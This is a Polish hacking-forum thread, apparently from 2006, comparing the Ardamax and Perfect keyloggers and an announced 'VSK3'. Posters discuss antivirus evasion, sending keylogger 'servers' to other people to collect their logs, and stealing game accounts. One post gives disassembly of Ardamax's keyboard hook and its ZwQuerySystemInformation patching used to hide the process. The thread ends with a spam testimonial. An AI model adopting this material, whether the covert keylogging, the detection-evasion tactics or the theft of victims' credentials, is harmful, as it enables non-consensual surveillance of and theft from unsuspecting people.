Ardamax keylogger vs Perfect Keylogger

seebz

Użytkownik
Dołączył
Marzec 12, 2006
Posty
8
Witam, czytajac forum mozna zauwazyc, ze bardzo znanym keyloggerem stal sie ardmax keylogger, dlatego chcialbym zadac pytanie takie male porownanie 2 keyloggerow mianowicie ardmax keylogger i perfect keylogger. Ktory z nich jest bardziej wykrywalny moze macie jakies doswiadczenia jezeli chodzi o te dwa programiki. Wiem tylko tyle, ze wiekszosc antywirusow wykrywa Perfect Keyloggera, jak jest z ardmaxem? Prosze o podzielenie sie swoimi doswiadczeniami
smile.gif
. POzdrawiam.
 

YRS

Użytkownik
Dołączył
Maj 15, 2006
Posty
22
ardmax tez wykrywalny przez wiekszosc AV jak i BPK a pomijajac wykrywalnosc to wole BPK :+) moze dlatego ze duzo wnim robilem
<


Ja mam inne pytanie czy 1serwer=1 osoba???[/b]

1server = 1231435346456357893573564753 osób :+)
 

zioło_amica

Użytkownik
Dołączył
Marzec 24, 2006
Posty
5
To troche dziwne bo dalem serwer dwóm osobą ale logi przychodzą tylko od tej co pierwsza uruchomila plik.
 

d3vil

Były Moderator
Dołączył
Lipiec 25, 2005
Posty
495
Niedługo zobaczycie VSK3, nie będzie błędów z poprzednich wersji (typu wpisywanie /log, będzie też opcja stworzenia servera bez użycia protokołu gg - tak jak np. w PK, funkcji będzie o wieele więcej a waga 3razy mniejsza)
wystarczające żeby przekonać do VSK3? :>
 

boness

Użytkownik
Dołączył
Październik 29, 2005
Posty
209
wystarczy...
<
2.1 tez nie byl taki zly ;]
ja czekam na vsk
<
i nie wykrywalny bedzie chwile ;]
 

L@M@

Użytkownik
Dołączył
Maj 28, 2006
Posty
7
vsk - server jako txt i już mam gg, maila, ftp.

ardamax - ctrl+c ctrl+v i bye -.-

PK - widać w taskmanagerze. IMO najlepszy keylogger.
 

d3vil

Były Moderator
Dołączył
Lipiec 25, 2005
Posty
495
VSK3 będzie mieć kodowanie i parenaście innych bajerów...
 

L@M@

Użytkownik
Dołączył
Maj 28, 2006
Posty
7
@up
ale nie zmienia to faktu że server=1 osoba
<

a taki keylogger to se można w d*** wsadzić.
 

patology

Były Moderator
Dołączył
Październik 30, 2005
Posty
205
Originally posted by L@M@
@up
ale nie zmienia to faktu że server=1 osoba
<

a taki keylogger to se można w d*** wsadzić.
Zabezpieczenie przed atakiem kont mmorpg... heheh =]
 

d3vil

Były Moderator
Dołączył
Lipiec 25, 2005
Posty
495
szczerze? - właśnie to zmienia fakt ;p
VSK3 będzie miało 2 opcje: jedna z obsługą gg, 2 bez niej.
Tłumaczyć dalej?
 

fl3a

Użytkownik
Dołączył
Marzec 12, 2005
Posty
538
A porownywal ktos keyloggery pok kontem technik ukrywania oraz mechanizmu logowania klawiszy? Wstepnie przejrzalem kod Ardamax keyloggera i musze pogratulowac tworcom standardowej miernoty...
 

FDJ

Były Moderator
Dołączył
Maj 23, 2005
Posty
1044
Originally posted by fl3a
A porownywal ktos keyloggery pok kontem technik ukrywania oraz mechanizmu logowania klawiszy? Wstepnie przejrzalem kod Ardamax keyloggera i musze pogratulowac tworcom standardowej miernoty...

Przypadkiem Ardamax nie uzywa komponentu keyspy ?
 

fl3a

Użytkownik
Dołączył
Marzec 12, 2005
Posty
538
Ardamax jest napisany w VC...
Kod:
.text:10001056; LRESULT __stdcall fn(int,WPARAM,LPARAM)

.text:10001056 fn              proc near              

.text:10001056

.text:10001056 nCode           = dword ptr  4

.text:10001056 wParam          = dword ptr  8

.text:10001056 lParam          = dword ptr  0Ch

.text:10001056

.text:10001056                 cmp     [esp+nCode], 0

.text:1000105B                 jge     short loc_10001077

.text:1000105D                 push    [esp+lParam]   ; lParam

.text:10001061                 push    [esp+4+wParam] ; wParam

.text:10001065                 push    [esp+8+nCode]  ; nCode

.text:10001069                 push    ds:hhk         ; hhk

.text:1000106F                 call    ds:CallNextHookEx

.text:10001075                 jmp     short locret_10001079

Kod:
.text:1000112E                 public Hook

.text:1000112E Hook            proc near

.text:1000112E

.text:1000112E arg_0           = dword ptr  4

.text:1000112E

.text:1000112E                 cmp     ds:hhk, 0

.text:10001135                 mov     eax, [esp+arg_0]

.text:10001139                 mov     ds:dword_10004004, eax

.text:1000113E                 jnz     short loc_1000115A

.text:10001140                 push    0              ; dwThreadId

.text:10001142                 push    hmod           ; hmod

.text:10001148                 push    offset fn      ; lpfn

.text:1000114D                 push    4              ; idHook

.text:1000114F                 call    ds:SetWindowsHookExA

.text:10001155                 mov     ds:hhk, eax

.text:1000115A

.text:1000115A loc_1000115A: 

.text:1000115A                 xor     eax, eax

.text:1000115C                 inc     eax

.text:1000115D                 retn

.text:1000115D Hook            endp

Kod:
.text:1000115E sub_1000115E    proc near               

.text:1000115E                 push    offset ProcName; "ZwQuerySystemInformation"

.text:10001163                 push    offset ModuleName; "ntdll.dll"

.text:10001168                 call    ds:GetModuleHandleA

.text:1000116E                 push    eax            ; hModule

.text:1000116F                 call    ds:GetProcAddress

.text:10001175                 test    eax, eax

.text:10001177                 mov     lpBaseAddress, eax

.text:1000117C                 jz      short loc_100011DB

.text:1000117E                 push    esi

.text:1000117F                 mov     esi, offset CriticalSection

.text:10001184                 push    esi            ; lpCriticalSection

.text:10001185                 call    ds:EnterCriticalSection

.text:1000118B                 push    0              ; lpNumberOfBytesRead

.text:1000118D                 push    6              ; nSize

.text:1000118F                 push    offset unk_1000302C; lpBuffer

.text:10001194                 push    lpBaseAddress  ; lpBaseAddress

.text:1000119A                 push    0FFFFFFFFh     ; hProcess

.text:1000119C                 call    ds:ReadProcessMemory

.text:100011A2                 push    0              ; lpNumberOfBytesWritten

.text:100011A4                 push    6              ; nSize

.text:100011A6                 push    offset Buffer  ; lpBuffer

.text:100011AB                 push    lpBaseAddress  ; lpBaseAddress

.text:100011B1                 mov     dword_1000300D, offset sub_100010DE

.text:100011BB                 push    0FFFFFFFFh     ; hProcess

.text:100011BD                 mov     Buffer, 68h

.text:100011C4                 mov     byte_10003011, 0C3h

.text:100011CB                 call    ds:WriteProcessMemory

.text:100011D1                 push    esi            ; lpCriticalSection

.text:100011D2                 call    ds:LeaveCriticalSection

.text:100011D8                 pop     esi

.text:100011D9                 jmp     short loc_100011E8

Mozna by powiedziec - tylko Overcodowac go ale komu by sie chcialo...
 

Kubuś 23

Użytkownik
Dołączył
Maj 29, 2013
Posty
2
Jestem pełen podziwu dla gościa o nicku Anonymous. Duża wiedza doświadczenie i co najważniejsze to uczciwość. Życzę mu dużo sukcesów. Tym którzy szukają pomocy polecam kontakt do Anonymous'a. Dzięki za pomoc !!!
 
Do góry Bottom